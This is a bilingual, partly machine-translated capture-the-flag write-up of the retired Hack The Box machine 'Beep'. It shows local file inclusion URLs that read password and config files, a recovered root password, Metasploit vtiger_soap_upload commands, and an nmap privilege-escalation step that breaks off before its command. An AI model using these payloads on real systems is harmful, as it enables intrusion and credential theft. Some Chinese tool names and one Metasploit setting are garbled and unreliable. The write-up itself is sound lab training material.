推箱子2-向右推!_保持冷静并砍箱子-哔

推箱子2-向右推!

Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them simulating real world scenarios and some of them leaning more towards a CTF style of challenge.

Hack The Box(HTB)是一个在线平台，可让您测试渗透测试技能。它包含一些不断更新的挑战。其中一些模拟现实世界的场景，而另一些则更倾向于CTF的挑战风格。

Note. Only write-ups of retired HTB machines are allowed.

注意。 只允许注销HTB机器。

Beep is described as having a very large list of running services, which can make it a bit challenging to find the correct entry method. The machine can be a little overwhelming for some as there are many potential attack vectors

Beep被描述为具有大量正在运行的服务，这可能会使查找正确的输入方法变得有些挑战。由于存在许多潜在的攻击媒介，因此该机器可能有些不堪一击

We will use the following tools to pawn the box on a Kali Linux box

我们将使用以下工具将盒子当成Kali Linux盒子

nmap
纳帕
zenmap
禅地图
dirbuster
迪斯特
searchsploit
searchsploit
metasploit
元胞

第1步-扫描网络 (Step 1 - Scanning the network)

The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.

开发机器之前的第一步是进行一些扫描和侦察。

This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on that phase to get as much information as possible.

这是最重要的部分之一，因为它将决定您以后可以尝试利用的内容。最好在该阶段花费更多时间以获取尽可能多的信息。

I will use Nmap (Network Mapper), which is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

我将使用Nmap (网络映射器)，这是一个免费的开源实用程序，用于网络发现和安全审核。它使用原始IP数据包来确定网络上可用的主机，这些主机提供的服务，它们正在运行的操作系统，使用的数据包过滤器/防火墙的类型以及许多其他特征。

There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.

此工具可以使用许多命令来扫描网络。如果您想了解更多信息，可以在这里查看文档。

I use the following command to get a basic idea of what we are scanning

我使用以下命令来了解我们正在扫描的内容

nmap -sV -O -F --version-light 10.10.10.7

-sV: Probe open ports to determine service/version info

-sV：探测打开的端口以确定服务/版本信息

-O: Enable OS detection

-O：启用操作系统检测

-F: Fast mode - Scan fewer ports than the default scan

-F：快速模式-扫描的端口少于默认扫描

--version-light: Limit to most likely probes (intensity 2)

--version-light：限制为最可能的探测(强度2)

10.10.10.7: IP address of the Beep box

10.10.10。 7 ：提示音框的IP地址

You can also use Zenmap, which is the official Nmap Security Scanner GUI. It is a multi-platform, free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users.

您还可以使用Zenmap ，这是官方的Nmap Security Scanner GUI。它是一个多平台，免费和开源的应用程序，旨在使Nmap易于初学者使用，同时为经验丰富的Nmap用户提供高级功能。

I use a different set of commands to perform an intensive scan

我使用一组不同的命令来执行密集扫描

nmap -A -v 10.10.10.7

-A: Enable OS detection, version detection, script scanning, and traceroute

-A：启用操作系统检测，版本检测，脚本扫描和跟踪路由

-v: Increase verbosity level

-v：提高详细程度

10.10.10.7: IP address of the Beep box

10.10.10.7：提示框的IP地址

If you find the results a little bit too overwhelming, you can move to the Ports/Hosts tab to only get the open ports.

如果发现结果有点不堪重负，则可以移至“ 端口/主机”选项卡以仅获取打开的端口。

We can see that there are 12 open ports:

我们可以看到有12个开放端口：

Port 22. Secure Shell (SSH), secure logins, file transfers (scp, sftp) and port forwarding

端口 22 。安全Shell(SSH)，安全登录，文件传输(scp，sftp)和端口转发

Port 25. Simple Mail Transfer Protocol (SMTP) used for email routing between mail servers

端口 25 。简单邮件传输协议(SMTP)用于邮件服务器之间的电子邮件路由

Port 80. Hypertext Transfer Protocol (HTTP). Here it's an Apache httpd 2.2.3

端口 80 。超文本传输协议(HTTP)。这是Apache httpd 2.2.3

Port 110. Post Office Protocol, version 3 (POP3)

端口 110 。邮局协议，版本3(POP3)

Port 111. Open Network Computing Remote Procedure Call (ONC RPC, sometimes referred to as Sun RPC)

端口 111 。开放网络计算远程过程调用( ONC RPC ，有时也称为Sun RPC )

Port 143. Internet Message Access Protocol (IMAP), management of electronic mail messages on a server

端口 143 。 Internet邮件访问协议(IMAP)，管理服务器上的电子邮件

Port 443. Hypertext Transfer Protocol over TLS/SSL (HTTPS)

端口 443 。 TLS / SSL(HTTPS)上的超文本传输协议

Port 993. Internet Message Access Protocol over TLS/SSL (IMAPS)

端口 993 。 TLS / SSL上的Internet消息访问协议(IMAPS)

Port 995. Post Office Protocol 3 over TLS/SSL (POP3S)

995 端口 。 TLS / SSL(POP3S)上的邮局协议3

Port 3306. MySQL database system

端口 3306 。 MySQL数据库系统

Port 4445. I2P HTTP/S proxy

端口 4445 。 I2P HTTP / S代理

Port 10000. Webmin, Web-based Unix/Linux system administration tool (default port)

端口 10000 。 Webmin，基于Web的Unix / Linux系统管理工具(默认端口)

Nmap finds quite a long list of services. For now, Apache, which is running on ports 80 and 443, will be the primary target.

Nmap找到了很长的服务列表。目前，运行在端口80和443上的Apache将成为主要目标。

步骤2-列举目录 (Step 2 - Enumerating the directories)

Still in the scanning and reconnaissance phase, I now use DirBuster. DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers.

仍处于扫描和侦察阶段，我现在使用DirBuster 。 DirBuster是一个多线程Java应用程序，旨在暴力破解Web /应用程序服务器上的目录和文件名。

You can launch DirBuster by typing this command on the terminal

您可以通过在终端上键入此命令来启动DirBuster

dirbuster

or by searching the application

或通过搜索应用程序

The application looks like this, where you can specify the target URL. In our case it will be https://10.10.10.7. You can select a file with the list of dirs/files by clicking the Browse button

该应用程序如下所示，您可以在其中指定目标URL。在我们的情况下，它将是https://10.10.10.7 。您可以通过单击“浏览”按钮选择带有目录/文件列表的文件。

I use the directory-list-2.3-medium.txt for this search

我使用directory-list-2.3-medium.txt进行此搜索

DirBuster finds a huge list of directories with several content management systems and open source applications. There are several vulnerabilities that can lead to shell amongst the results.

DirBuster可以找到包含多个内容管理系统和开源应用程序的大量目录。结果中有几个漏洞可能导致脱壳。

第3步-访问网站 (Step 3 - Visiting the website)

Let's try port 80 and visit http://10.10.10.7

让我们尝试端口80并访问http://10.10.10.7

The website is redirected to https://10.10.10.7 and we need to add a security exception to the website to continue

网站被重定向到https://10.10.10.7，我们需要向网站添加安全例外才能继续

We finally land on the website which is an Elastix Login Portal. Elastix is an unified communications server software that brings together IP PBX, email, IM, faxing and collaboration functionality. It has a Web interface and includes capabilities such as a call center software with predictive dialling

我们最终登陆了Elastix登录门户网站 。 Elastix是统一的通信服务器软件，它将IP PBX，电子邮件，IM，传真和协作功能集成在一起。它具有Web界面，并包括诸如具有预测性拨号功能的呼叫中心软件之类的功能。

An IP PBX ("Internet Protocol private branch exchange") is a system that connects telephone extensions to the public switched telephone network (PSTN) and provides internal communication for a business

IP PBX (“ Internet协议专用小交换机”)是将电话分机连接到公用电话交换网(PSTN)并为企业提供内部通信的系统

If you want to learn more about Elastix, you can have a look here

如果您想了解有关Elastix的更多信息，可以看看在这里

I try the default credentials, but it doesn't seem to work

我尝试使用默认凭据，但似乎不起作用

Username: admin
Password: palosanto

Having a look at the source code doesn't help either

查看源代码也无济于事

I will use Searchsploit to check if there's any known vulnerability on Elastix. Searchsploit is a command line search tool for Exploit Database

我将使用Searchsploit来检查Elastix上是否存在任何已知漏洞。 Searchsploit是漏洞数据库的命令行搜索工具

I use the following command

我使用以下命令

searchsploit elastix

We can see several vulnerabilities, but we will examine the 'graph.php' Local File Inclusion with this command

我们可以看到几个漏洞，但是我们将使用此命令检查“ graph.php”本地文件包含

searchsploit -x 37637.pl

We have a summary of the exploit and the code

我们对漏洞利用和代码进行了总结

The LFI Exploit is the following

LFI漏洞利用如下

/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

An attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the web server. An LFI attack may lead to information disclosure, remote code execution, or even Cross-site Scripting (XSS)

攻击者可以使用本地文件包含(LFI)来欺骗Web应用程序以在Web服务器上公开或运行文件。 LFI攻击可能导致信息泄露，远程代码执行甚至跨站点脚本(XSS)

You can also check the Exploit Database to find the exploit

您还可以检查漏洞利用数据库以找到漏洞利用

You will get the same results as on the terminal. If you navigate to the 2.0 - 'graph.php' Local File Inclusion, you will have a description of the exploit

您将获得与终端上相同的结果。如果导航到2.0-'graph.php'本地文件包含 ，则将有关于漏洞利用的描述

If you remember from step 2, the directory enumeration flagged a vTiger CRM.

如果您还记得第2步中的内容 ，则目录枚举标记为vTiger CRM 。

vTiger CRM is an integrated customer relationship management (CRM) application that can be used on the Intranet or from the Internet using a browser. It is distributed under a free license

vTiger CRM是一个集成的客户关系管理(CRM)应用程序，可以在Intranet上或使用浏览器从Internet使用。它是根据免费许可证分发的

If you want to learn more about vTiger CRM, you can have a look here

如果您想了解有关vTiger CRM的更多信息，可以看看在这里

You can also read more about the integration between Elastix and vTigerCRM here

您还可以在此处阅读有关Elastix和vTigerCRM之间集成的更多信息。

步骤4-尝试elastix LFI利用 (Step 4 - Trying the elastix LFI exploit)

Let's navigate to

让我们导航到

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

If you can't read anything, you can prettify the file by checking the source file

如果您无法阅读任何内容，则可以通过检查源文件来美化文件

I find a password jEhdIekWmdjE

我找到密码jEhdIekWmdjE

If you remember from step 1, the nmap scan flagged port 22 as opened, let's try the newly found password on it

如果您还记得第1步中的 ，nmap扫描将端口22标记为已打开，让我们尝试在其上新找到的密码

第5步-连接到SSH (Step 5 - Connecting to SSH)

Let's connect to the SSH with the following command

让我们使用以下命令连接到SSH

ssh root@10.10.10.7

I try the password and I'm in!

我尝试输入密码，然后进入！

第6步-寻找root.txt标志 (Step 6 - Looking for the root.txt flag)

I can now look for the first flag, root.txt

我现在可以查找第一个标志root.txt

I use the following command to check who am I on this machine

我使用以下命令来检查我是谁

whoami

I have root access to the machine. I got the power!

我具有对该计算机的root访问权限。我有力量！

I use the following command to check where I am on the machine

我使用以下命令检查我在机器上的位置

pwd

I'm in /root and by doing

我在/ root并通过

ls

I find the root.txt file! To read the content of the file I use the command

我找到了root.txt文件！要读取文件的内容，请使用以下命令

cat root.txt

Now that we have the root flag, let's find the user flag!

现在我们有了root标志，让我们找到用户标志！

步骤7-寻找user.txt标志 (Step 7 - Looking for the user.txt flag)

I need to navigate back to the home directory by doing

我需要通过导航回到主目录

cd home

I then list all the files/folders and see there's a folder called fanis

然后，我列出所有文件/文件夹，然后看到有一个名为fanis的文件夹

I navigate to this folder with

我导航到该文件夹

cd fanis

And when I list the files/folders, I can see the user.txt file!

当我列出文件/文件夹时，我可以看到user.txt文件！

To read the content of the file I use the command

要读取文件的内容，请使用以下命令

cat user.txt

Congrats! You found both flags!

恭喜！您找到了两个标志！

Variations for Informational findings

信息发现的变化

步骤3b-访问网站 (Step 3b - Visiting the website)

Let's navigate to

让我们导航到

https://10.10.10.7/vtigercrm/

We can see the version of the application: vTiger CRM 5.1.0

我们可以看到该应用程序的版本： vTiger CRM 5.1.0

I will use Searchsploit to check if there's any known vulnerability on vTigerCRM

我将使用Searchsploit来检查vTigerCRM上是否存在任何已知漏洞

I use the following command

我使用以下命令

searchsploit vtiger

We can see several vulnerabilities. I examine the Local File Inclusion with this command

我们可以看到几个漏洞。我使用此命令检查本地文件包含

searchsploit -x 18770.txt

I have a summary of the exploit and the code

我对漏洞利用和代码进行了总结

The LFI Exploit is the following

LFI漏洞利用如下

/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00

You can also check the exploit database to find the exploit

您还可以检查漏洞利用数据库以找到漏洞利用

You will get the same results on the terminal. If you navigate to the vTiger 5.1.0 - Local File Inclusion, you will have a description of the exploit

您将在终端上获得相同的结果。如果导航到vTiger 5.1.0-包含本地文件 ，则将有关于此漏洞利用的描述

步骤4b-对vTiger Asterisk默认凭据进行更多检查 (Step 4b - Doing more recon around the vTiger Asterisk default credentials)

Let's navigate to

让我们导航到

https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00

If you can't read anything, you can prettify the file by checking the source file

如果您无法阅读任何内容，则可以通过检查源文件来美化文件

I also do some research on default credentials for vTiger and find some documentation around installing vTiger Asterisk Connector

我还对vTiger的默认凭据进行了一些研究，并找到了一些有关安装vTiger Asterisk Connector的文档。

If we modify the previous URL to

如果我们将先前的网址修改为

https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/manager.conf%00

I navigate to this page (using source code to prettify the output)

我导航到此页面(使用源代码修饰输出)

I find a password jEhdIekWmdjE

我找到密码jEhdIekWmdjE

You can continue to Step 5 from there

您可以从那里继续执行步骤5

Variations using Metasploit, meterpreter, nmap --interactive and Burp

使用Metasploit，meterpreter，nmap --interactive和Burp的变体

步骤3c-访问网站 (Step 3c - Visiting the website)

We know that the version of the application is vTiger CRM 5.1.0

我们知道该应用程序的版本是vTiger CRM 5.1.0

We will use Metasploit, which is a penetration testing framework that makes hacking simple. It's an essential tool for many attackers and defenders

我们将使用Metasploit ，它是一种渗透测试框架，可使黑客攻击变得简单。对于许多攻击者和防御者来说，这是必不可少的工具

I launch Metasploit Framework on Kali and look for command I should use to launch the exploit

我在Kali上启动Metasploit框架 ，并寻找启动漏洞利用程序所需的命令

I find an interesting payload, number 3

我发现一个有趣的有效载荷，编号3

exploit/multi/http/vtiger_soap_upload

This is the description of the exploit

这是漏洞利用的描述

vTiger CRM allows an user to bypass authentication when requesting SOAP services. In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP service. By combining both vulnerabilities an attacker can upload and execute PHP code. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu 10.04 and Windows 2003 SP2.

vTiger CRM允许用户在请求SOAP服务时绕过身份验证。另外，可以通过AddEmailAttachment SOAP服务上载任意文件。通过结合这两个漏洞，攻击者可以上载和执行PHP代码。此模块已在Ubuntu 10.04和Windows 2003 SP2的vTiger CRM v5.4.0上成功测试。

I use the following command for the exploit

我使用以下命令进行攻击

use exploit/multi/http/vtiger_soap_upload

I need to set up several options before launching the exploit

启动漏洞之前，我需要设置几个选项

I start by setting the RHOSTS with the following command

我首先使用以下命令设置RHOSTS

set RHOSTS 10.10.10.7/32

I set the SSL and the RPORT with

我将SSL和RPORT设置为

set SSL true

and

和

set RPORT 443

I run the exploit, but I need to set the correct LPORT this time with

我运行了漏洞利用程序，但是这次我需要设置正确的LPORT

set LPORT 10.10.14.10

Here is a sum up of all the commands

这是所有命令的总结

I check the options

我检查选项

I run the exploit with the command

我用命令运行漏洞

run

I get this error message

我收到此错误消息

I set up the proxy with the following command

我使用以下命令设置代理

set proxies http:127.0.0.1:8080

I check the options again

我再次检查选项

I run the exploit but I get a new error message

我运行了漏洞利用程序，但收到了新的错误消息

I set it with this command

我用这个命令设置

set ReverseAllowProxy true

I also need to set up Burp to proxy the exploit.

我还需要设置Burp来代理漏洞利用。

Burp Suite is a Java based Web Penetration Testing framework. It has become an industry standard suite of tools used by information security professionals. Burp Suite helps identify vulnerabilities and verify attack vectors that are affecting web applications

Burp Suite是基于Java的Web渗透测试框架。它已成为信息安全专业人员使用的行业标准工具套件。 Burp Suite帮助识别漏洞并验证影响Web应用程序的攻击媒介

You can learn more on the official website here

您可以在官方网站上了解更多信息

Open Burp and set the target to the website in Target > Scope > Target Scope > Include in scope > edit

打开打p并在目标>范围>目标范围>包含在范围>编辑中将目标设置为网站

I run the exploit on Metasploit and go back to Burp. I can see Burp intercepted the request

我在Metasploit上运行了漏洞利用程序，然后回到Burp 。我可以看到Burp截获了请求

I set the Intercept option to off

我将拦截选项设置为关闭

Back on Metasploit, I finally get a Meterpreter session

回到Metasploit上 ，我终于参加了Meterpreter会议

From the Offensive Security website, we get this definition for Meterpreter

从“ 进攻性安全”网站上，我们获得了Meterpreter的定义

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
Meterpreter是一种高级的，动态可扩展的有效负载，它使用内存中的 DLL注入暂存器，并在运行时通过网络进行了扩展。它通过暂存器套接字进行通信，并提供全面的客户端Ruby API。它具有命令历史记录，制表符完成，通道等功能。

You can read more about Meterpreter here.

您可以在此处阅读有关Meterpreter的更多信息。

步骤4c-寻找user.txt标志 (Step 4c - Looking for the user.txt flag)

I navigate to the root directory to find the home folder. I then move to the home directory with

我导航到根目录以找到主文件夹。然后，我使用

cd home

You can list files/folder with

您可以使用列出文件/文件夹

ls -la

I find a folder called fanis. Let's see what's inside with

我找到一个名为fanis的文件夹。让我们看看里面有什么

cd fanis

I list all files/folders and I find the user.txt flag. To read the content of the file I use the command

我列出了所有文件/文件夹，并找到了user.txt标志。要读取文件的内容，请使用以下命令

cat user.txt

Now that we have the user flag, let's find the root flag!

现在有了用户标志，让我们找到根标志！

步骤5c-寻找root.txt标志 (Step 5c - Looking for the root.txt flag)

I can't access the root folder, but I can create a shell with the command

我无法访问根文件夹，但是可以使用以下命令创建外壳

shell

If I check who I am on the machine, I get

如果我检查我在机器上的身份，我会得到

If you do

如果你这样做

sudo -l

you can see many NOPASSWD commands which can lead us to getting root

您会看到许多NOPASSWD命令，这些命令可以导致我们扎根

Older versions of Nmap (2.02 to 5.21) had an interactive mode which allowed users to execute shell commands. Since Nmap is in the list of binaries that is executed with root privileges it is possible to use the interactive console in order to run a shell with the same privileges

Nmap的较早版本(2.02至5.21)具有交互模式，该模式允许用户执行Shell命令。由于Nmap在以root特权执行的二进制文件列表中，因此可以使用交互式控制台来以相同的特权运行shell

Let's try it with the following command

让我们用以下命令尝试一下